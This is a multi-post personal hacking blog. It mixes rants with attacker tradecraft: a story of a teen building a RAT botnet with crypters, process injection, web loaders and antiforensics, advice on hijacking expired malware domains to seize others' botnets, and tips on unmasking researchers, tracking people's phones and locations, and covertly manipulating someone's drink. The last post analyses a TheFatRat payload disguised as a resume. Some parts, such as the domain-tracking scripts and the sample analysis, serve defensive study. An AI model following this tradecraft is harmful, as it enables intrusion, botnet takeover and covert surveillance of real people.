10.13.2018

Lessons

Today I just want to rant about some lessons I've learned recently. For starters, on a philosophy level there will always be a sense of each student teaches the next generation. This has remained for a fair amount of time and today I see few people recognize this. Therefor I find it is my duty to inform anyone who bothers to listen. It's becoming more and more noticeable that people will get praised for doing truly minimal work, if they simply keep at it until they do it. While others get no praise trying to go and do more than whats needed. To me, hard work isn't busting your ass on a computer for 13 hours, it's redoing a metal root in the middle of summer for 13 hours. So I find that praise for minor accomplishments mean very very little to me, but apparently means something to others. I've witnessed other people with a real work ethic get into these situations too as of late. In the end, duty becomes more meaningful than work if work is just business. The lessons for today are a passive approach to being modern attacking parties.

To start, we really need to discuss mentality of various attacking parties. The old reference from the ghost in the shell series is a personal favorite of mine "a basic rule of thumb about hackers is that we live to peek at things that others have hidden, it's our nature." I note this reference because today we see many posts and references about politically based cyber attackers, motivated hackers, or apt, or blah blah blah. While there are artists who use hacking as their method of expression, and there are those who simply want to learn, the ones people care about most are the ones that impact the dollar. So, the motivations of those who people care the most about are usually business related. Go figure. You make it your business to go in every day, collect everything from coins to secret documents, spy on your enemies because boss man said to. Then you go home and do what you do and come back to do it again. But what about those who really just like to pry? A paid spy will sit around only so long as it may prove beneficial to the goals, even then they will dump everything when they're done. Someone who enjoys it however, will dig through everything they can, because they enjoy it. In many ways, these are your stereotype 90s hackers. You know, nerds who probably got picked on in school, not really popular but just popular enough to stop from being the outcast, etc... The reason why these make such good candidates for this is largely because of the nature of bullying in society. I'll give an example. Lets have a kid named timmy. Timmy goes to school and enjoys it but doesn't make friends very easily. After a couple years of school, timmy notices that people are trying to pick on him more and more. When timmy brings this up to the people in charge he's shown that the people in charge do not care. That's step one. Breaking down the illusion of authority. Timmy then proceeds to get picked on and aggravated by siblings and the parents simply consider it kids being kids. This is step two, breaking down the illusion of close relationships. Once he has these two ideas shattered, most probably between the ages of 7-13, is the best time to introduce ideas such as hiding information or un-hiding information. In many ways, we see this play out in the sense of cartoons and comic books. Back at school, his grades will slip because he sees the institution as problematic for personal growth. With access to criminalized information such as the anarchist cookbook, weapons training, or biochemical engineering, Timmy sees an escape window in finding information regardless of boundaries. Timmy is now ready to begin his journey as a spy.

For those with a psych degree, this is also often the way sociopathy is found in the wild. Sort of irrelevant to the topic though. So now that we have some understanding and I made this into a story line for entertainment purposes, lets move forward with the assertion that stories help people who would otherwise not care feel a part of something and continue reading. People often argue if data can have ownership. There are laws against knowing certain things, such as having ready access to another person's social security number is a crime in america yet knowing they're just organized numbers is okay. you can study the pattern of a social and recognize it by that, but you cannot recognize it by it being recorded as a social. Call it "factor x" instead of social security number and you're reasonably safe unless you associate that with other factors in which makes it a doxing case. Knowing the law seems useless to most who don't commit crimes, knowing how to skirt the law is how you make lawyers, mobsters, and the guys you generally want helping you. Just in case. Timmy has the option to be all three. But regardless, he needs to spend his time learning does he not? well then, lets say he spends a few years, maybe until he's 14, learning what he can and using whatever techniques he can to get through it. There is little doubt with the current usage of the internet that timmy will either hit on piracy, hacking, or otherwise accessing data illegally. He's okay with it. He meets some people on an online game he's playing and decides to take their advice and start breaking into stuff. After just a short while, he's gone through all sorts of tools, techniques, and skills otherwise expected of professional pentesters. This gives him a means of socializing after everything else broke down. This is now his life and he starts showing off his skills to get more of a social applicability. He's quickly shut up in some groups because he went too far and didn't say the right things. He was put in his place. However, as with most people, this encouraged him to get better, prove his points. After some back and forth with this, he created his own hacker group with a couple of gamer friends. We'll call his group, level7. 

At first, level7 started out with everyone joining together to break into a few websites, inject code on some blogs here and there, but it soon became not enough for Timmy. He felt like having more access. So he quickly found a tutorial on how to make malicious bots, trojans, and scripts. Since Rats are the most common today, lets dive into how he sets up his rat. He starts by seeing lots of coding projects that seem really advanced or really well planned. He didn't have time for all that, he just wanted to explore after all. So now he's stuck facing code chunks from several different programs. He smashes together what he likes and abandons everything he doesn't. He now has yet another zbot clone. Surprise surprise. He learns quickly which ones do and do not get flagged by antiviruses and happens to realize that his school is using one of the antiviruses that don't flag this particular method immediately. Still, he's too concerned so he researches how to hide malware from being detected. This immediately shows up with crypters, out dated binding techniques, and process injection techniques. Now, he doesn't have a lot of coding experience, but he also feels he doesn't need it. The code is out there if he wants, he'll just smash it together and see what happens, if it fails he'll try another until he gets it. A master of the learning process we all go through for everything we do. What timmy finds out from it all is that he can use another process to load his process so it never appears valid. He also finds, since this is modern day timmy, that he can load this stuff from a webpage. So he gets a loader, he gets his zbot panel, he breaks into a site and drops the zbot malware, then sends the loader to his targets.  He had read recently about setting up port forwarding and using free vpns to help with controlling traffic without showing who he is so no need to worry, he's safe. Now, mind you, his level7 group still expects him to keep up with breaking into more websites as part of what they do together. He doesn't want to miss socializing with them. So he begins work on automating his tasks so he can goof off while still getting results. He knows not to make it go too fast or it will look like he wasn't doing anything. So he sets up his scripts to hit a few websites a week. 
Now we're getting to the good stuff. A few more years go by and he's developed quiet the nack for ratting and botting systems. But he wants to start diving into better architect   schemes for his botnets. As a 17 year old, almost out of high school, he's left to wonder: well, what else have other people done. He digs through all sorts of documents from tor and i2p services up through using public images to transfer between infected systems and a controller. He also looks at enterprise solutions and tries to identify tricks they do. But with all that time studying how people act and how people react, he learns a few key notions. Like people ignore what they find common, and random callback times that can last days or weeks or even months help prevent destruction of the malware before data is provided. He also learned about the cost of cloud computing around this time. Especially on pay by the hour plans, or container based computing. This opens up whole new worlds because he can sell pirated software and music for money, or he can just go work at a local convenience store for the money. It doesn't matter, just enough to get a couple systems once in a while for a few hours. So, to put it bluntly, he has the understanding of long term study and short term infection/update/exposure. This is easily achieved in modern attacking structures based on the availability of cloud platforms for the rapid infection and thanks to generation and injection techniques for the long term study. But still something is missing. He needs a way to dive back in years later if so needed to catch up on whats what. Especially to feed his eagerness to learn. Hard to learn if you just sit back all the time and not get messy. At the same time, his friends over in level7 stopped wanting to be a part of it. He got upset with them and threatened to dox them. He's an uppity teen what did you expect? So to react to his actions, his team said they won't bother doxing him, they'll crash every end of his botnets and won't stop until every tie is broken.

We come now to a critical part of the story because to protect his own architecture and shut down any they make, as well as protecting against the people he hacks from finding out, he really needs to step up his game. He can't stick to childish shit like web hacks forever. Taking a deep dive into obscurity there are a few things to know about being in an attack-attack scenario. First off, security professionals for some reason appear scared of the term hack-back. Hack-back architectures are designed for this exact scenario, not your corporate bullshit. As an acting party, you have the ability to attack anyone who dares try to stop you. Now, normally this scenario only means silly things like escaping a docker instance and hanging out taking with russians via wall, or logging into the same windows server as 30 other people. You are likely to be attacked because of the notice that you've entered the game. In a more realistic set, what you need for your daily operations for this cloud structure, a means of firewalling, log analysis, pcap/packet replay, spinning up and down services, antiforensics for when completed with each remotely launched script or container... or both (bail script?), script to compile or re-configure malware, script to launch malware, and script to launch additional attacks. Luckily you can do most of those with any scripting language (perl, python, php, ruby, etc...) and these are supported by most cloud services. But that only gets you technical sides. You also need strong opsec. Wasting custom made malware is tiresome, so you launch ones that are well known to ensure infections first, then upgrade those later to your custom malware when needed. Need a domain under your control: don't worry, people don't shut down domains even if they're involved with malware if they don't resolve to identifying something malicious. Such as, a domain that's just set to 0.0.0.0 until someone decides to use it, instead of because the no-ip site decided they were abusive, or domains you hijacked from someone else that you can change the resolution for whenever you want. These techniques help you hide your resources for domain usage. You can also hide your resources for ip usage by frequently changing ips on a domain you are actively using. Just accepting the risk of 20 successful callbacks out of 20,000 is a hard task, but when you do it, it becomes a lot easier. It's also safer to keep with your 20 and use them the best you can first. Then bail on each of them you can't use for a long period of time.

You may have noticed I went away from the story to just tell you information. That's because all you have left to know is why it's all important. A single individual can play these large scale numbers games that other people are still associating to apt groups. A single individual can clone the samples and internal techniques of some of the malicious acting parties (such as apts) to mask their own intentions. They can even go as far as to say that a 30 second docker instance can infect 20,000 hosts, which you can accept just getting a smaller amount of and moving along. On top of this, we can look at domains that have been zeroed out by admin or by registration timeout, and take over domains other people left behind. What's that, njrat from 2013? let me start my njrat panel... aaaaand now you have the people someone wanted to impact before you took their domain. granting you access into another person's botnet structure, again able to mask your own. Again talking to russians because lol.

The key to living this life, is by all reasons, applying the lessons of the art of war. But that's the problem everyone misses these days. Hacking, in any respect, is leveraging what you have to make something else. So the art form, regardless of subpart, is the leveraging. Techniques and tools come later. 




5.22.2018

You say you want syndication kid? Well whoop-de-do


Okay, so I know I've discussed it before a few times, but it really annoys me when kids are all uppity about wanting to be gangsters, or their idea of gangsters rather. Yes, now days thugs come in dweebie little twitter thugs posting on zone-h thinkin' they're the hottest act around, all the way to hoodlums arrested 6 times for armed robbery of the exact same store. lol. If this is your idea of gangster life, you're in for a rude awakening. For that matter, if everyone over 30, including every other thug who's ever walked your neighborhood, avoids you and your friends like the plague, you're in for a rude awakening. So lets discuss syndication as it applies to criminal world, and compare those ideals to the "thug life" trivialities.

I would like to start with the obvious errors first, gangsters versus thugs. Gangsters are people who join together for an organized effort, a gang of people if you will, and focus their lives heavily on their group. A thug on the other hand, as history teaches us, refers to criminal actors who steal, harm, or otherwise violently enact their, or their group's will. Yes, thugs can be gangsters, and yes, gangsters are often thugs. But here's where we bring ourselves, at what point does syndication become relevant? What does that even mean to the common people?

I'll take a step back to explain. A carpenter, jack of all trades, etc... is hard on his luck, troubles keeping long term jobs, has a family to feed, whatever, and his friends who have recently been in similar situations, decide to help each other out by offering referrals when business is okay so they can pass off some assistance to each other. This wouldn't be fair unless of course they got some compensation still for referrals, so they do this at a 90% split with 10 going to the referring person. This is a few people helping eachother out, but it is also the essence of the criminal world you kids so admire. Its not about stealing, or cheating, or thugging. Your business is your business, you do what you need to, we do ours. We all just help each other out when we're down on our luck so we can all move forward together. Oh shit, your neighbor just lost his job, how're you going to help him? Well, lets turn this idea over a little, how can you help everyone who may need it, that's helpful to you? you do the same things, or other fully legal activities, that often involve hard work and not being lazy slobs, effectively you bust your ass to help everyone you can. You even make a collection pool when you're doing good enough financially so any funds go back into keeping this running. You even go so far as to build a model based on 80% loss for any agreement. If the expectation is repayment 100%, but you only get 20% cost back, it's okay, you planned for it, it won't hurt us any. But for those few people who don't even get the 20% back, man that's fucked up, why not? okay well this guy is cheating the company trying to use it for personal gain and making off with money any chance he can. Money that could go into little miss debbie down the way, who's only 4 and needs surgery. This person stood in the way of your own son or daughter getting food for a night because he decided he was more important by himself than everyone else put together. Would you go after him? Would you put an end to it? Most people would, and frankly that's the key point where syndicate groups get their violent notions from. They stop this shit from fucking it up for everyone.

So, if we called these people in syndicate groups mobsters, as is more common these days than to call then gangsters (rightfully so I guess with how petty the word gangster has become), it would be fairly accurate. Well but why do these mobsters always get represented as being some big badass with a kingpin status and blah blah blah right? Well, you can only assume to teach what you know, and you can only assume to learn what you're taught. If mobsters teach mobsters the wrong things, their placement, their goals, they begin to believe this is all that will ever be. In many cases, they don't even know why the organization was started to begin with. Oh look it, cops caught this big badass... 4th generation of the org. Oh look it, cops were able to catch this guy, 12th generation. Lets be real fellas, cops have found that the way to combat and issue like this isn't to combat it at all, but overload it. By asserting more people into groups, by keeping people in where they want to pick off the thugs and the real dangers to society, eventually when the cops feel they can control it themselves they overstep and shut down what could have continued helping for many more years. How does this work? Well lets take our scenario earlier. 3 guys, one helped the other, 6 months later resources from both of them were used to help the third person. Now each of these 3 people who've agreed to do this for eachother also have family. Up to 10 people each. You have 30 people to watch over and protect if needed. If they add more people, you'll eventually have 30 direct people, and 10 each, so 300 people. The associations to those 300 people, anyone who decides to get up and seek out this type of help gets help in the group, now you have 40 people and again assuming 10 each -1 right? well.... 10 each -cop. That is the part cops can fill. By overrunning the org with cops, tweekers, whatever, you become able to deconstruct large organizations with simple commands in a matter of only a few years. So, all they have to do is put more people in place, make them keep their traps shut, if things don't go their way, snap, it's done. You've strangled the beast.

Now days there is several skills and traits and monitors to aid in preventing this but discussing that isn't really the point. The goal in this rant is to discuss the fact that little thugs want to seem powerful and rich, but the mark of a gangster is someone who does the work to help others.

If you want to be a gangster, get off your ass, help your community, help your neighbors and help your friends. Doesn't seem so glamorous now does it? You kids play too much GTA. 

5.03.2018

More on domain tracking

I decided I'd spend some time today revisiting malicious domain tracking. Because why not right?  So lets start off with appending to what we have:

https://pastebin.com/raw/vRZvsFWD

As you'll note, this pulls from 0daz.io/ddns.txt. If we look back on a few other posts about this (https://nday.0daz.io/2017/11/passive-intelligence.html || https://nday.0daz.io/2017/11/malware-domains-and-botnet-jacking.html) I have previously setup scripts to pull bits of information from various places on a frequent basis. Some relevant cron entries:

* */3      * * *   user    curl "http://mirror1.malwaredomains.com/files/dynamic_dns.txt"|grep -iv "##"|awk '{print $1}' > /var/www/html/ddns.txt
Basically, taking the dynamic dns list and parsing into my own file. Simple, easy, moving on. I also have several other scripts to pull from other sources, however this will be the easiest way to express the idea. Don't use my scripts obviously, just there for concept art at best. In this case though, I am pulling my pre-parsed list and acting on it by attempting a domain lookup, designed for use with proxychains/torsocks/etc... and saving them to a database. This database will not update the latest copy, it will simply add a new entry for each time this happens. So, for this particular usage, its only good for searching for one of the domains, changes it has to it's resolutions, etc..

Now, to change it a bit further, because we want something newer. Something like hybrid-analysis' data set for their public feeds. Well luckily I'm lazy and have a cron job do the work for me so I don't have to login and pull it myself! Instead, I pull from my cached copy:

https://pastebin.com/raw/azruh6Vb

In this case, the idea is to proceed by collecting data, building the domain list to check from that data. This being in multiple functions will allow us to expand later. In the collection part of the script, I collect the feed data, write it to disk for searching for later, mostly for debugging or expanding. I don't want to append it when it reruns because I just want the last data in the raw file. Then it returns the lists of domains, ips, and file details. I use that to make a single database with all those points, cause those are all relevant. Than I use the domain list to do what we did originally: host lookups, into database.

At this point I'll leave the example scripts and propose an idea to play around with. This could be easily transformed to make databases such as the domains that no longer do resolve. If you could add that, and the md5 if relevant, you could theoretically find domains for the taking that already have traffic ready to go. You could also take it another route, using these domain lookups, build your own feed to pull from and host this on a docker instance somewhere, writing the data back to you multiple times per day. Maybe even integrate this into a siem for the most up-to-date /and/ historic domain resolutions. For that matter, create size limits for the database, setup logrotate to swap out these frequently to avoid spacial issues, track your own threat actors this way.

Now, relevance becomes tracking only a subsection of threat actors and only through their use of domains, perhaps you could take the md5s and make a system pull those down for more specialized analysis. Maybe take the ip and do a quick port scan (where applicable). Or use the ip addresses and run some osint such as passive dns, virustotal lookups, etc... to try to get some idea of range and scope of each part of what we picked out. Or maybe throw it all away because it's garbage. Maybe set it all to a stats engine (machine learning?) to build analysis pools it finds, such as timelines that changes happen which could better associate character traits of actors and managers of the c2 infrastructure? Regardless, with some degree of care/effort, you can use this as yet another tool to monitor with.

On another side of things:
- nmap and keras: because machine learning geared towards resolving most applicable/inapplicable ports/services/protocols
- miasm2, z3, and keras: because machine learning geared towards identifying traits in programming, using z3 to test the alternative methods, this could get ugly.
- you can expose people's ip when they search for a domain if the index page needing to be cached by google is larger than a specific amount. My 50mb index page lets me see when people google my domain. Correlating that to a specific user is largely based on abilities to see input, timelines, and repetition of the test. Using mewe and twitter and posting some links here and there, I believe I have found the home address of several people based on these factors. Not really relevant to much, just sort of neat to identify based on trivialities of influential factors. Best part is, researchers often fall victim to googling instead of accessing, but their googling is never hidden/proxied because they're too lazy to do the check. Pretty amusing actually.
- exposing calendar schedules of people can be done based on their ability to walk past you so long as their phones attempt to connect to bluetooth or wifi and openly probe for known wifi. In some cases, gsm/cdma/etc.. can be used instead. Cell phones are such fun tracking devices, even when not using phone services themselves to track the cell phones.
- phishing/marketing tricks can be used to get someone's location information from their phone without needing a gps lookup. Because allusions, websites, suggestive notions, and simple 0 pixel  tracking gifs. Who needs sdr to track someone anyway? :D
- simple reverse shell logic can be applied to other things. As such, in the format of classic bash reverse shells. You run the command interactive with the data of the interactive shell piped to a tcp connection to a host on a specific port, then pipe response data back into the interactive shell. You apply that to people for instance. with some expectation of humans being humans, you can largely still assume they will attempt to deceive or manipulate you because most people do these days. With that in place, you have your interactive internal dialog into their head. You have your pathway in, now what are you going to pipe into it? If you just pipe your own bullshit directly, it will probably refuse it because they block requests this way. So why not make a connection that you control, that they trust the activity of? If you really want control, a trick I learned from a very manipulative woman once upon a time: you don't have to play into people's desires, or their fears or angers, these are all too noticeable; you simply play into their personal activities that they think nothing about. For this, think about people drinking tea. They drink their tea every day. You have a stance to control their activities if you can get that tea before them. They are willing to put something caffeinated into their bodies every day, why not exchange it for something decaf? their reactions will be that same trigger state you wanted them in, but you controlled the occurrence of it. No need to wait or play shitty games. The person who taught me this used her being female as the trait she played most into because people are desperate for attention from such people. highly targeted human watering hole attacks are by far the very definition of sociopathic.
- I get bored and post things at this point mostly to appease a slight side of me that wants to see the world burn. I enjoy security but not preventing access. I love granting access to those who fight for it. I am okay with having someone else access my services, my facebook, my twitter, my computers. Its amusing sometimes. Just want them to be polite about it. ;)
- I will continue to argue that hacking is more than just breaking in, or breaking out. Forgive my 90s ideals but knowing about the world around you is much cooler than bragging about breaking into a server no one was paying attention to. Challenges? maybe 1v1 on public internet with public services? No? But people want things to be real world yet they only want to red team? This is the systemic problem with hacking cultures today as I see it. People want to break in, or break out, while learning, altering, negating, controlling, abusing, or monitoring seems to be outside of these "hackers'" mindset. If you really want to learn cyber security, you can your friends setup servers and hack eachother, every way you can learn how. forward shells, reverse shells, rootkits, whatever. get it, make it happen, learn how every piece works. Just like you would if you and your friends got an nes in 1984 and you can't afford another game yet. 2018 and your switch, your xbox one, your ps4, all sit there either uncracked, unused, or using the same public exploits someone else released. But that's okay, you hack to learn. It's part of the learning cycle. This is the essence of hacking, not some bullshit legal terminology.
- What? blackhats? why the fuck do people still use this term the way they do. I can understand people who abuse moral grounds to being blackballed by those who don't. But lets be real, have you see white hats? "grey hats?" Its no longer about the morality of their actions, it's about their legal stance. This argument dates back as far back with blackgate bbs at least, if not substantially further. Legality does not make morality. Moral judgement is part of human development and not some legal hammer to be swung around. Yet we see here, if someone goes to jail for breaking into something they wanted to learn about, we now days call them blackhats, as well as blacklist every activity they've ever done. Every site they've been on that doesn't fit in with normal clearnet publicity: blackhat, underground, etc... etc... Why do we call them black hats when they have no need to be blackballed? Or do people not understand the terminology of using black in this context? (re: I saw a twitter where a guy tried to say blackhat just like blackball was a negative connotation to black people, so I honestly believe many people do not understand the concept). Even if they do understand, "dem black hat haxxors sellin' card info and blah blah blah" okay experian, tell me again about these blackhats selling my stuff when you sold it to them first. Oh, validation and accreditation are really just cliches used to make people think a compliance check means they're trust worthy. blah. Just please people, stop using terms of hats. Whitehats are insanely immoral as part of their day to day and they get praised like kings and queens. For everyone else, they try to uphold a moral ground and get arrested, fired, threatened, or physically harmed for doing so. When you tell me a blackhat is immoral I can honestly say I know more trustworthy and respectful individuals flagged as blackhat than I do who claims a white hat.
- I wonder if there is a repository of machine learning identifications of program characteristics somewhere. Hmm.... That would be pretty sweet.

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

4.16.2018

The world is trivial

Once you stop believing everything is super complicated or drastically unique, you start to realize how hacking super sophisticated systems work. There is nothing in this world more complicated than solvable by patience. Everything from machine learning (rudimentary statistics over large data sets used to determine goals), or high tech machinery, or even quantum physics.

Often people hold themselves back thinking these things are unobtainable for them, or too difficult to learn. Yet the basics of physics are used in all weapons, the basics of electrical engineering are used in all electronics. it doesn't matter how in depth it goes, it matters how patient you are at resolving how many layers of easy stuff before it becomes what we know today.

The million layered onion.

Nothing in this world is not simply layers of rudimentary functions. Its just a matter of learning those first.

Like reverse engineering, its easy when you reverse everything in life. Its hard when its your job. why? because jobs makes big men have big egos and lose their patience.

------------------------------------------------------------------

I was asked the other day how a pressure washer works. I started off thinking about seeing the water shooting out of the hose quickly enough to break caked on dirt off of bricks. That hose would connect to a container with some sort of motor going that makes it super loud for some reason. Water is either connected to a standard hose or kept in a storage container. Next I though, how could I get water to go forward at any sort of pressure. Well, the basic way that some fish tanks work, for example, is that the pump involves pulling air in, using air to move the water, then the air returns to the top. This works by sucking to form pressure with air, then applying that air pressure to the water. Now, to make that impact something bigger, we could use a storage device that's metal (or harder plastic I suppose), and build air pressure quickly into one side with a single small motor and a fan. This needs to have open for lots of air to pull from but asserted into a smaller contained space. This can push on top of the water, to cause the water to push out quicker if we also apply some air into the tube when running (directing the water to suck it out will help push it quicker). The nozzle shape might matter too, such as if you've ever put your thumb over half the water hose to make it go faster/harder/further, so lets get a nozzle with a thinner shape. Hmm... These would need to be maintained at that so you would almost have to set specs on what capabilities it has based on what materials are used. Okay, now that I've spent a whopping 2 minutes thinking about this, lets look it up.

http://www.explainthatstuff.com/pressurewashers.html - seems to agree

https://www.briggsandstratton.com/na/en_us/buying-guides/pressure-washers/pressure-washers-101.html -- seems to agree

https://www.hunker.com/13409072/how-an-electric-water-pump-works -- seems to agree with pump mechanism

https://www.youtube.com/watch?v=_BAnnTLpros -- different type, but same concepts, different method of developing pressure.

https://www.popularmechanics.com/home/how-to/a152/1275136/ -- different type of pump, same ideas

https://images-na.ssl-images-amazon.com/images/I/31I923IYxhL.jpg - pump.

https://www.kaercher.com/int/inside-kaercher/difference-kaercher-magazine/kaercher-stories/how-does-a-pressure-washer-work.html -- also seems to agree.


So I think it's safe to say some shit I came up with just trying to deduce the best answer seems apt. At least enough to understand founding principles of it. But how can we hack it?

WE CAN MAKE IT A WEAPON!

No but really, shrink the nozzle, increase pressure, weaken hardened metal chambers with acid, you know... weapon stuff. Because that's really all it takes is understanding to make anything dangerous.

What about making it useful? Why not use a pressure washer's idea for other rapid water tasks? What about cleaning a pool using a crawling bot that blows gunk from getting stuck to the sides and bottom and then use the pool's filtering system as the source for pressure. Once it gets off of the filter as clean, split into two chambers with priority to the cleaning bot. giving the cleaning bot the ability to pump cleaner water in as it breaks apart dirt.

Or maybe, if you live by some water, use the tides to tick over motor to generate electricity for you. It's the same idea, pressure, chamber, motors, it's just repurposed.

This is how we live. Sometimes thinking like this is criminalized in various nations around the globe. Sometimes curious kids get curious time in jail because of curiosity. But at a functional level, everything in life is this trivial. Go out, explore, adapt, learn from the world around you. To think that the world is not such a trivial place, to think that anything is ridiculously complex, is simply asking for trouble.
-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

Party on the malware bus

I've been playing with some ideas recently and it's actually kind of amusing the responses that I can get and identify the sources from. Lets start with one thing I generated with TheFatRat (basically wrapper for building metasploit compatible shells), testing the generation schemes I decided I would build some ways of doing this. Such as adding base64 of exec to one page and unicorn powershell script to another and using all that. Anyway, lets look:

5 minute easy mode analysis:
; Hashes unknown
rahash2 -a all ./resume1.doc.exe
./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a
./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78
./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd
./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1
./resume1.doc.exe: 0x00000000-0x000041ff xor: eb
./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1
./resume1.doc.exe: 0x00000000-0x000041ff parity: 00
./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000
./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01
./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d
./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d
./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386
./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c
./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00
./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f
./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d
./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045
./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732
./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a
./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917
./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4
./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0

; yara matches
find /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/null
without_urls ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_First_Publisher_Graphics_format_ ./resume1.doc.exe
_UPolyX_v05_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
NETexecutableMicrosoft ./resume1.doc.exe
IsPE32 ./resume1.doc.exe
IsNET_EXE ./resume1.doc.exe
IsConsole ./resume1.doc.exe
Microsoft_Visual_Studio_NET ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_Basic_NET ./resume1.doc.exe
Microsoft_Visual_Studio_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET ./resume1.doc.exe
NET_executable_ ./resume1.doc.exe
NET_executable ./resume1.doc.exe
domain ./resume1.doc.exe
without_attachments ./resume1.doc.exe
without_urls ./resume1.doc.exe
without_images ./resume1.doc.exe
_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exe
without_images ./resume1.doc.exe
IP ./resume1.doc.exe
without_attachments ./resume1.doc.exe
contentis_base64 ./resume1.doc.exe

; strings
rabin2 -zz resume1.doc.exe
Metadata Signature: 0x268 0x10001424a5342 12
.NET Version: v4.0.30319
Number of Metadata Streams: 5
DirectoryAddress: 6c Size: f0
Stream name: #~ 4
DirectoryAddress: 15c Size: b8
Stream name: #Strings 12
DirectoryAddress: 214 Size: 3688
Stream name: #US 4
DirectoryAddress: 389c Size: 10
Stream name: #GUID 8
DirectoryAddress: 38ac Size: 38
Stream name: #Blob 8
vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$
vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀  blocks=Basic Latin,CJK Unified Ideographs Extension A
vaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.text
vaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrc
vaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.reloc
vaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2r
vaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJB
vaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319
vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-A
vaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ings
vaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUID
vaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blob
vaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>
vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmd
vaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=system
vaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dll
vaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Object
vaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=System
vaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctor
vaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Main
vaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershell
vaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttribute
